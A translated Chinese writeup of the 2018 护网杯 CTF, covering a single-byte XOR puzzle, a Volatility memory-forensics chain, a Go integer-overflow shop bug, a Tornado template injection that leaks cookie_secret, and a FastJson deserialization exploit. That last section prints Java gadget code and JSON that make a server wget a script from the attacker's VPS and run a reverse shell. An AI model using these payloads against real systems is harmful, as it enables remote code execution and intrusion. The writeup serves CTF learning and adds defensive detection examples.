NEKO

护网杯 writeup

2018/10/13

MISC

迟来的签到题 (the belated sign-in challenge)

This imitates a cryptography challenge from CSAW 2018, but the hint is not as misleading as CSAW's was; brute-forcing the single-byte XOR key is enough.

exp.py

import base64

# ciphertext given by the challenge, base64-encoded
s = base64.b64decode('AAoHAR0nJ1YlUVQnU1BTVCVfUVZRUVUkUCBeUlVWIlBXUiNTXhs=')

# try every single-byte key and print one candidate plaintext per line
for i in range(0xff + 1):
    for j in s:
        try:
            print(chr(j ^ i), end='')
        except UnicodeEncodeError:
            pass
    print()
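As an added example, not code from the original post: the same brute force, but it filters the 256 candidates down to those that decode to printable ASCII and then picks the one matching the flag{...} format, so the key is recovered automatically rather than by scrolling through 256 lines. The ciphertext is the one above; the flag format used as a crib and the printability filter are my assumptions.

```python
import base64
import re

# ciphertext from the challenge (base64 as given above)
CIPHERTEXT = base64.b64decode('AAoHAR0nJ1YlUVQnU1BTVCVfUVZRUVUkUCBeUlVWIlBXUiNTXhs=')
# assumed flag format, used as the crib
FLAG_RE = re.compile(r'^flag\{[^{}]+\}$')


def xor_with_key(data: bytes, key: int) -> bytes:
    """XOR every byte of data with the single-byte key."""
    return bytes(b ^ key for b in data)


def printable_candidates(data: bytes):
    """(key, plaintext) for every single-byte key whose output is all printable ASCII."""
    out = []
    for key in range(256):
        pt = xor_with_key(data, key)
        if all(0x20 <= b < 0x7F for b in pt):
            out.append((key, pt.decode('ascii')))
    return out


def recover_flag(data: bytes):
    """Narrow the printable candidates down to the single one matching the flag format."""
    matches = [(k, pt) for k, pt in printable_candidates(data) if FLAG_RE.match(pt)]
    return matches[0] if len(matches) == 1 else None


if __name__ == '__main__':
    cands = printable_candidates(CIPHERTEXT)
    print(f'{len(cands)} of 256 keys give printable text')
    key, flag = recover_flag(CIPHERTEXT)
    print(f'key=0x{key:02x} -> {flag}')
```

Printability alone is not enough on this input: several keys in the 0x60 to 0x7e range also turn every byte into printable text, which is why a crib (here the flag prefix and braces) is needed to pin the key down.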

easy_dump

Not bad... Honestly this one isn't hard; once you know it is memory forensics you can get straight to work, it just chains together quite a few techniques. One small pitfall is that the notepad plugin doesn't work, but a quick Google search sorts that out. The challenge hints at what to do next at every step, so it is not a difficult one.
After reading the other teams' writeups I learned a lot; very few took the same route as me... most of them probably count as unintended solutions. The masters are strong, ORZ.

The download is a memory dump file; analyze it with the memory forensics tool Volatility.

root@neko:~# volatility -f easy_dump.img imageinfo
Volatility Foundation Volatility Framework 2.6
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/root/easy_dump.img)
PAE type : No PAE
DTB : 0x187000L
KDBG : 0xf80004006070L
Number of Processors : 1
Image Type (Service Pack) : 0
KPCR for CPU 0 : 0xfffff80004007d00L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2018-09-28 03:49:29 UTC+0000
Image local date and time : 2018-09-28 11:49:29 +0800

Choose the Win7SP1x64 profile and list the processes:

root@neko:~# volatility -f easy_dump.img --profile=Win7SP1x64 pslist
Volatility Foundation Volatility Framework 2.6
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xfffffa8007d0ab30 System 4 0 86 473 ------ 0 2018-09-28 09:01:33 UTC+0000
0xfffffa8008331b30 smss.exe 248 4 4 29 ------ 0 2018-09-28 09:01:33 UTC+0000
0xfffffa8009290800 csrss.exe 336 320 8 543 0 0 2018-09-28 09:01:33 UTC+0000
0xfffffa80094fa760 wininit.exe 388 320 7 92 0 0 2018-09-28 09:01:33 UTC+0000
0xfffffa80094fd060 csrss.exe 396 380 10 267 1 0 2018-09-28 09:01:33 UTC+0000
0xfffffa8009939140 winlogon.exe 432 380 6 122 1 0 2018-09-28 09:01:33 UTC+0000
0xfffffa8009982b30 services.exe 492 388 15 228 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa800998a2b0 lsass.exe 500 388 9 610 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa80099337c0 lsm.exe 508 388 11 157 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa80099dc9e0 svchost.exe 600 492 17 375 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa80099fc8e0 vmacthlp.exe 656 492 5 55 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa8009a2a9e0 svchost.exe 696 492 10 305 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa8009a62620 svchost.exe 776 492 20 427 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa8009a90b30 svchost.exe 828 492 23 399 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa8009aac740 svchost.exe 864 492 48 839 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa8009adbb30 audiodg.exe 940 776 6 124 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa8009b20270 svchost.exe 1020 492 17 583 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa8009b712a0 svchost.exe 716 492 20 398 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa8009c0c1b0 spoolsv.exe 1188 492 16 335 0 0 2018-09-28 09:01:35 UTC+0000
0xfffffa8009c08b30 dwm.exe 1200 828 7 126 1 0 2018-09-28 09:01:35 UTC+0000
0xfffffa8009c27b30 taskhost.exe 1220 492 10 182 1 0 2018-09-28 09:01:35 UTC+0000
0xfffffa8009c32250 svchost.exe 1248 492 24 324 0 0 2018-09-28 09:01:35 UTC+0000
0xfffffa8009c57760 explorer.exe 1312 1164 37 986 1 0 2018-09-28 09:01:35 UTC+0000
0xfffffa8009de3970 VGAuthService. 1544 492 4 88 0 0 2018-09-28 09:01:35 UTC+0000
0xfffffa8009dfcb30 vmtoolsd.exe 1584 492 9 294 0 0 2018-09-28 09:01:35 UTC+0000
0xfffffa8009e38060 vmtoolsd.exe 1628 1312 10 222 1 0 2018-09-28 09:01:35 UTC+0000
0xfffffa800a381b30 TPAutoConnSvc. 2008 492 9 132 0 0 2018-09-28 09:01:36 UTC+0000
0xfffffa800a398060 WmiPrvSE.exe 1108 600 10 186 0 0 2018-09-28 09:01:36 UTC+0000
0xfffffa800a39c060 dllhost.exe 1396 492 20 199 0 0 2018-09-28 09:01:37 UTC+0000
0xfffffa800a3c5b30 dllhost.exe 628 492 18 208 0 0 2018-09-28 09:01:37 UTC+0000
0xfffffa8008abc060 svchost.exe 1532 492 7 95 0 0 2018-09-28 09:01:38 UTC+0000
0xfffffa8009da6b30 msdtc.exe 1008 492 15 155 0 0 2018-09-28 09:01:38 UTC+0000
0xfffffa800a44e060 VSSVC.exe 2168 492 6 119 0 0 2018-09-28 09:01:39 UTC+0000
0xfffffa800a468170 SearchIndexer. 2280 492 15 618 0 0 2018-09-28 09:01:41 UTC+0000
0xfffffa800a529460 SearchProtocol 2356 2280 7 228 1 0 2018-09-28 09:01:42 UTC+0000
0xfffffa800a53b670 SearchFilterHo 2376 2280 5 82 0 0 2018-09-28 09:01:42 UTC+0000
0xfffffa800a5316d0 TPAutoConnect. 2580 2008 5 117 1 0 2018-09-28 09:01:47 UTC+0000
0xfffffa800a4d6580 conhost.exe 2588 396 1 32 1 0 2018-09-28 09:01:47 UTC+0000
0xfffffa800a5d1b30 notepad.exe 2616 1312 1 57 1 0 2018-09-28 09:01:51 UTC+0000
0xfffffa8008b49b30 WmiPrvSE.exe 2712 600 13 293 0 0 2018-09-28 09:01:56 UTC+0000
0xfffffa800ca9ca70 WmiApSrv.exe 2760 492 7 118 0 0 2018-09-28 09:01:58 UTC+0000
0xfffffa80082a3b30 dllhost.exe 2900 600 6 81 0 0 2018-09-28 09:02:14 UTC+0000
0xfffffa8008301930 dllhost.exe 2932 600 7 109 1 0 2018-09-28 09:02:15 UTC+0000
0xfffffa8009bfd710 dllhost.exe 2968 600 6 112 1 0 2018-09-28 09:02:15 UTC+0000
0xfffffa8008a89b30 dllhost.exe 3004 600 10 199 1 0 2018-09-28 09:02:15 UTC+0000
0xfffffa8009e0d510 dllhost.exe 2448 600 6 84 1 0 2018-09-28 09:02:18 UTC+0000
0xfffffa8009b63b30 DumpIt.exe 2500 1312 2 43 1 1 2018-09-28 09:02:18 UTC+0000
0xfffffa8009e12270 conhost.exe 2552 396 2 58 1 0 2018-09-28 09:02:18 UTC+0000

There is a notepad.exe process, but on Win7 x64 Volatility's notepad plugin does not work, so dump the memory of the notepad.exe process instead (see https://www.andreafortuna.org/dfir/volatility-tips-extract-text-typed-in-a-notepad-window-from-a-windows-memory-dump/):

root@neko:~# volatility -f easy_dump.img --profile=Win7SP1x64 memdump -D . -p 2616
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing notepad.exe [ 2616] to 2616.dmp

Try searching for the flag. Because Notepad keeps the text in memory as 16-bit little-endian characters (UTF-16LE), search with strings -e l ./2616.dmp | grep flag.

root@neko:~# strings -e l ./2844.dmp | grep flag
flag{flag is not here,but I put an strange jpg for you,hope you like it :)}
flag{flag is not here,but I put an strange jpg for you,hope you like it :)}
flag{flag is not here,but I put an strange jpg for you,hope you like it :)}
Allow flag to be passed with CreateFile call that indicates to perform downgrade if applicable.
thread_flags
activation_flags
thread_flags
activation_flags
flags
flags
flag{flag is not here,but I put an strange jpg for you,hope you like it :)}
Repairing the flags for file record 0x%1.
The file attributes flag 0x%1 in file 0x%3 is incorrect.
The sparse flag in the standard information attribute in file 0x%1
The sparse flag in the standard information attribute in file 0x%1
The old encrypted flag is being replaced by the new encrypted flag
The encrypted flag in standard information attribute in file 0x%1
The reparse flag in standard information attribute in file 0x%1
The reparse flag in standard information attribute in file 0x%1
The sparse flag of attribute of type 0x%1 and name %2 in file
Cleaning up encrypted flag for file 0x%1.
Cleaning up sparse flag for file 0x%1.
Repairing the flags for file record 0x%1.
The file attributes flag 0x%1 in file 0x%3 is incorrect.
The sparse flag in the standard information attribute in file 0x%1
The sparse flag in the standard information attribute in file 0x%1
The old encrypted flag is being replaced by the new encrypted flag
The encrypted flag in standard information attribute in file 0x%1
The reparse flag in standard information attribute in file 0x%1
The reparse flag in standard information attribute in file 0x%1
The sparse flag of attribute of type 0x%1 and name %2 in file
Cleaning up encrypted flag for file 0x%1.
Cleaning up sparse flag for file 0x%1.
usbflags
usbflags\CLASS_%02X_SUBCLASS_%02X_PROTOCOL_%02X
usbflags\CLASS_%02X_SUBCLASS_%02X
usbflags\CLASS_%02X
usbflags\vvvvpppprrrr
usbflags
usbflags\0E0F00030102
usbflags\0E0F000B0100
usbflags\0E0F00020100
usbflags\0E0F00080100
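Added example, not part of the original writeup: what `strings -e l ... | grep flag` does, reimplemented in Python so the encoding detail is explicit. It scans a byte buffer for runs of printable ASCII stored as UTF-16LE (each character followed by a 0x00 byte) and keeps the ones containing the search term. The sample "dump" is constructed inline; it also embeds the same kind of text as plain ASCII to show that the UTF-16 scan skips it.

```python
import re

# constructed sample "dump": a UTF-16LE Notepad buffer surrounded by binary noise,
# plus a plain-ASCII string that a UTF-16LE scan must not report
SAMPLE_DUMP = (
    b'\x00\x01\x02MZ\x90\x00'
    + 'flag{constructed_sample_not_the_real_one}'.encode('utf-16-le')
    + b'\xff\xfe\x00\x00'
    + b'Repairing the flags for file record'
    + b'\x00\x00'
    + 'thread_flags'.encode('utf-16-le')
    + b'\x00'
)


def utf16le_strings(data: bytes, min_len: int = 4):
    """Like `strings -e l`: printable ASCII runs stored as UTF-16LE (<char, 0x00> pairs)."""
    pattern = re.compile(rb'(?:[\x20-\x7e]\x00){%d,}' % min_len)
    return [m.group().decode('utf-16-le') for m in pattern.finditer(data)]


def grep(strings, needle: str):
    """Like `| grep needle`: keep the strings that contain the needle."""
    return [s for s in strings if needle in s]


def search_dump(data: bytes, needle: str = 'flag'):
    """strings -e l <dump> | grep <needle>, in pure Python."""
    return grep(utf16le_strings(data), needle)


if __name__ == '__main__':
    for s in search_dump(SAMPLE_DUMP):
        print(s)
```

A plain `strings` run (8-bit encoding) would miss the Notepad buffer entirely, since every other byte is 0x00; conversely the UTF-16LE pass does not see 8-bit text, so a process dump is worth scanning in both encodings.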

This reveals the hint:

flag{flag is not here,but I put an strange jpg for you,hope you like it :)}

Search for a jpg:

root@neko:~# volatility -f easy_dump.img --profile=Win7SP1x64 filescan | grep jpg
Volatility Foundation Volatility Framework 2.6
0x000000002408c460 32 0 RW---- \Device\HarddiskVolume1\phos.jpg

There is an image called phos.jpg; dump it:

root@neko:~# volatility -f easy_dump.img --profile=Win7SP1x64 dumpfiles -Q 0x000000002408c460 -D .
Volatility Foundation Volatility Framework 2.6
DataSectionObject 0x2408c460 None \Device\HarddiskVolume1\phos.jpg
SharedCacheMap 0x2408c460 None \Device\HarddiskVolume1\phos.jpg

After saving it locally and renaming it to phos.jpg, binwalk shows a zip archive appended to the image; extracting and unzipping it yields an ext filesystem image:

root@neko:~# binwalk phos.jpg 

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, EXIF standard
12 0xC TIFF image data, little-endian offset of first image directory: 8
13367 0x3437 Unix path: /www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://
2238922 0x2229CA Zip archive data, at least v2.0 to extract, compressed size: 49478, uncompressed size: 1048576, name: message.img
2288534 0x22EB96 End of Zip archive

Mount the image on a freshly created directory; it contains hint.txt and an empty lost+found directory.
hint.txt is a list of coordinates, which can be plotted as an image with gnuplot or with a Python script.

gnuplot:

The resulting image can be scanned with the qr_research tool on Windows.

Python script:

from PIL import Image

# hint.txt holds one "x y" coordinate pair per line; light each as a white pixel
img = Image.new('RGB', (270, 270))
imgload = img.load()

with open('hint.txt') as f:
    for line in f:
        line = line.strip()
        if not line:
            continue
        x, y = line.split()
        imgload[int(x), int(y)] = (255, 255, 255)
img.show()

Result: the plotted points form a QR code (image in the original post).

Scanning it gives the hint:

Here is the vigenere key: aeolus, but i deleted the encrypted message。

Go back to the directory where the image is mounted and run ls -al:

root@neko:~/_phos.jpg.extracted/message# ls -al
总用量 271
drwxr-xr-x 4 root root 1024 9月 28 10:33 .
drwxr-xr-x 3 root root 4096 9月 28 18:05 ..
-rw-r--r-- 1 root root 257163 9月 28 09:13 hint.txt
drwx------ 2 root root 12288 9月 28 09:06 lost+found
drwx------ 4 root root 1024 9月 28 10:33 .Trash-0

.Trash-0/files contains .message.swp:

root@neko:~/_phos.jpg.extracted/message/.Trash-0/files# ls -la
总用量 14
drwx------ 2 root root 1024 9月 28 10:33 .
drwx------ 4 root root 1024 9月 28 10:33 ..
-rw------- 1 root root 12288 9月 28 08:58 .message.swp

Recover the file with vim -r message, which gives the following content:

yise!dmsx_tthv_arr_didvi

Decrypting it with the Vigenère key aeolus gives the flag:

yeet!just_find_and_solve
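Added example, not code from the original post: a Vigenère implementation that decrypts the recovered message with the key aeolus. Note the convention it assumes: non-letters such as ! and _ are copied through and do not advance the key. That is the convention the message above requires; if the punctuation consumed key positions, the same key would not produce the flag.

```python
import string

ALPHABET = string.ascii_lowercase


def _shift(ch: str, key_ch: str, decrypt: bool) -> str:
    """Shift one lowercase letter by the key letter (subtract when decrypting)."""
    a, k = ALPHABET.index(ch), ALPHABET.index(key_ch)
    return ALPHABET[(a - k) % 26] if decrypt else ALPHABET[(a + k) % 26]


def vigenere(text: str, key: str, decrypt: bool) -> str:
    """Vigenère over a-z. Non-letters are copied through and do NOT advance the key."""
    key = key.lower()
    out, ki = [], 0
    for ch in text:
        low = ch.lower()
        if low in ALPHABET:
            res = _shift(low, key[ki % len(key)], decrypt)
            out.append(res.upper() if ch.isupper() else res)
            ki += 1
        else:
            out.append(ch)
    return ''.join(out)


def vigenere_encrypt(plaintext: str, key: str) -> str:
    return vigenere(plaintext, key, decrypt=False)


def vigenere_decrypt(ciphertext: str, key: str) -> str:
    return vigenere(ciphertext, key, decrypt=True)


if __name__ == '__main__':
    # message recovered from .message.swp, key from the QR hint
    print(vigenere_decrypt('yise!dmsx_tthv_arr_didvi', 'aeolus'))
```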

WEB

easy_laravel

Please see 4uuu Nya's blog: https://qvq.im/
(props to 院长)

Itshop

Normally you can only exchange for 4 大辣条 (big latiao), but a race condition lets you get more; just run the request through Burp's Intruder.
In the cookies you can find

go_iris_cookie=d6f80149-edbd-4f33-8def-8f423e0321b7

which shows the backend is written in Go.
Fuzzing the 辣条之王 (latiao king) exchange shows that once the quantity gets large enough, it complains that you do not have enough big latiao.
Since Go is a strongly typed language, I guessed an integer overflow.
Testing showed the counter is an unsigned 64-bit integer, whose maximum is 18446744073709551615.
Five big latiao buy one latiao king, so buying 3689348814741910324 latiao kings costs 18446744073709551620 big latiao, which exceeds the uint64 range and wraps to 5; so only 5 big latiao are needed to buy 3689348814741910324 latiao kings.
(props to zer0i3)
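Added example, not code from the writeup or from the shop's backend: the purchase check modelled in Python, once with the cost computed the way an unchecked uint64 multiply does (masked to 64 bits) and once with overflow detection. Computed exactly, 5 × 3689348814741910324 wraps to 4 modulo 2^64, which a balance of 5 big latiao covers; the price and quantity are the writeup's, the balance check is my assumption about the backend.

```python
UINT64_MAX = (1 << 64) - 1
PRICE = 5                      # big latiao per latiao king (from the writeup)
QTY = 3689348814741910324      # quantity ordered in the writeup


def wrapped_cost(price: int, qty: int) -> int:
    """Cost as an unchecked uint64 multiply computes it: the product modulo 2**64."""
    return (price * qty) & UINT64_MAX


def checked_cost(price: int, qty: int):
    """Cost with overflow detection: None when the true product does not fit in uint64."""
    total = price * qty            # Python ints are unbounded, so this is the exact product
    return None if total > UINT64_MAX else total


def can_afford(balance: int, price: int, qty: int, checked: bool) -> bool:
    """Server-side purchase check (assumed logic), overflow-prone or safe variant."""
    cost = checked_cost(price, qty) if checked else wrapped_cost(price, qty)
    return cost is not None and cost <= balance


if __name__ == '__main__':
    print('wrapped cost :', wrapped_cost(PRICE, QTY))
    print('checked cost :', checked_cost(PRICE, QTY))
    print('unchecked buy with 5 latiao allowed?', can_afford(5, PRICE, QTY, checked=False))
    print('checked buy with 5 latiao allowed?  ', can_afford(5, PRICE, QTY, checked=True))
```

In Go the equivalent check is math/bits.Mul64, which returns the high and low 64 bits of the product; a non-zero high word means the cost overflowed and the purchase should be rejected, and the quantity should also be capped at something a shop can plausibly sell.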

easy_tornado

First, there is template injection here:

http://49.4.79.120:31286/error?msg={{1}}

But the filtering is strict.
The hint points at render().
In the underlying implementation of render() we find:

def get_template_namespace(self):
    """Returns a dictionary to be used as the default template namespace.

    May be overridden by subclasses to add or modify values.

    The results of this method will be combined with additional
    defaults in the `tornado.template` module and keyword arguments
    to `render` or `render_string`.
    """
    namespace = dict(
        handler=self,
        request=self.request,
        current_user=self.current_user,
        locale=self.locale,
        _=self.locale.translate,
        pgettext=self.locale.pgettext,
        static_url=self.static_url,
        xsrf_form_html=self.xsrf_form_html,
        reverse_url=self.reverse_url
    )
    namespace.update(self.ui)
    return namespace

The namespace returned here contains handler=self, i.e. the handler object itself, with everything the application defined on it.
The payload is:

http://49.4.79.120:31286/error?msg={{handler.settings}}

This leaks the application settings, including cookie_secret.
(props to 院长)
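Added example, not part of the writeup: detection logic for the probes shown above, run over constructed access-log lines. It URL-decodes each query string and flags Tornado template delimiters, with a separate verdict for expressions that reach into handler., since that is the route to settings and cookie_secret. The log format, the sample lines and the regexes are my assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# constructed access-log lines (common log format); not real traffic from the challenge
SAMPLE_LOG = """\
10.0.0.5 - - [13/Oct/2018:09:00:01 +0800] "GET /error?msg=File%20not%20found HTTP/1.1" 200 512
10.0.0.9 - - [13/Oct/2018:09:00:07 +0800] "GET /error?msg=%7B%7B1%7D%7D HTTP/1.1" 200 128
10.0.0.9 - - [13/Oct/2018:09:00:12 +0800] "GET /error?msg=%7B%7Bhandler.settings%7D%7D HTTP/1.1" 200 2048
10.0.0.7 - - [13/Oct/2018:09:00:20 +0800] "GET /static/app.js HTTP/1.1" 304 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d+)'
)
TEMPLATE_PROBE = re.compile(r'\{\{|\{%|\{#')      # Tornado template delimiters
HANDLER_ACCESS = re.compile(r'\{\{\s*handler\.')  # expression reaching into the handler object


def classify_request(url: str):
    """'handler-access', 'template-probe' or None for one request URL (query is URL-decoded)."""
    values = ' '.join(v for _, v in parse_qsl(urlsplit(url).query, keep_blank_values=True))
    if HANDLER_ACCESS.search(values):
        return 'handler-access'
    if TEMPLATE_PROBE.search(values):
        return 'template-probe'
    return None


def scan_log(text: str):
    """Parse each line and return (ip, timestamp, url, verdict) for suspicious requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify_request(m['url'])
        if verdict:
            findings.append((m['ip'], m['ts'], m['url'], verdict))
    return findings


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

On the application side the fix is to never build a template from user input: render a fixed template file and pass msg in as a variable, which Tornado escapes by default.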

easy_web

A FastJson deserialization vulnerability; this article explains it in detail:
https://kevien.github.io/2018/06/18/FastJson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E(%E7%BB%AD)/
evil.java:

public class evil extends Thread {
    private static Thread thread = new evil();
    private static String cmd = "wget http://vps/neko.py -O /tmp/neko.py";

    static {
        try {
            String[] cmds = System.getProperty("os.name").toLowerCase().contains("win")
                ? new String[]{"cmd.exe", "/c", cmd}
                : new String[]{"/bin/bash", "-c", cmd};
            Runtime.getRuntime().exec(cmds);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Compile the Java source to bytecode:

javac evil.java

This produces evil.class.
BCEL-encode it:

import com.sun.org.apache.bcel.internal.classfile.Utility;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

public class BCELencode {
    public static void main(String[] args) throws Exception {
        // this must be the compiled .class file, not the .java source
        Path path = Paths.get("/Users/n3k0/IdeaProjects/java_code/src/evil.class");
        byte[] data = Files.readAllBytes(path);
        String s = Utility.encode(data, true);
        System.out.print(s);
    }
}

Write evil.json:

{
    "@type" : "org.apache.tomcat.dbcp.dbcp.BasicDataSource",
    "driverClassLoader" :
    {
        "@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"
    },
    "driverClassName" : "<the encoded string obtained in the previous step>"
}

Sending evil.json makes the server execute wget http://vps/neko.py -O /tmp/neko.py, where neko.py is a Python reverse shell script hosted on your own VPS.
Repeat the same steps with an evil.json that executes python /tmp/neko.py, listen on the VPS, and you get a shell.
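Added example, not code from the writeup or from FastJson: a request-body check that walks a JSON document and reports every @type key at any depth, applied to a constructed body with the same structure as evil.json above (a placeholder stands in for the BCEL-encoded class). The empty allowlist and the known-gadget list are my assumptions; the two class names are the ones in evil.json.

```python
import json

# class names taken from the evil.json above; any other @type not on the allowlist is 'unlisted'
KNOWN_GADGET_TYPES = {
    'org.apache.tomcat.dbcp.dbcp.BasicDataSource',
    'com.sun.org.apache.bcel.internal.util.ClassLoader',
}
ALLOWED_TYPES = set()   # assumption: this API never needs a client-supplied @type

# constructed body with the structure of evil.json; placeholder instead of the BCEL payload
SAMPLE_BODY = json.dumps({
    "@type": "org.apache.tomcat.dbcp.dbcp.BasicDataSource",
    "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"},
    "driverClassName": "<bcel-encoded-class-placeholder>",
})


def find_type_keys(node, path='$'):
    """Recursively collect (json_path, class_name) for every "@type" key, at any depth."""
    found = []
    if isinstance(node, dict):
        for key, value in node.items():
            if key == '@type' and isinstance(value, str):
                found.append((path, value))
            found.extend(find_type_keys(value, f'{path}.{key}'))
    elif isinstance(node, list):
        for i, value in enumerate(node):
            found.extend(find_type_keys(value, f'{path}[{i}]'))
    return found


def check_body(raw: str):
    """('accept'|'reject', findings); each finding is (path, class, 'known-gadget'|'unlisted')."""
    try:
        doc = json.loads(raw)
    except json.JSONDecodeError:
        return 'reject', [('$', '', 'invalid-json')]
    findings = []
    for path, cls in find_type_keys(doc):
        if cls in ALLOWED_TYPES:
            continue
        findings.append((path, cls, 'known-gadget' if cls in KNOWN_GADGET_TYPES else 'unlisted'))
    return ('reject' if findings else 'accept'), findings


if __name__ == '__main__':
    print(check_body(SAMPLE_BODY))
    print(check_body('{"item": "latiao", "qty": 3}'))
```

This is a compensating control at the edge, not the fix: the real remediation is keeping FastJson's autoType disabled and upgrading the library, because a check keyed on class names only catches the gadgets it already knows about.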

Author: n3k0

Published: October 13th 2018, 9:52:20

Shout: no 魔夜2 to play, I'm dying
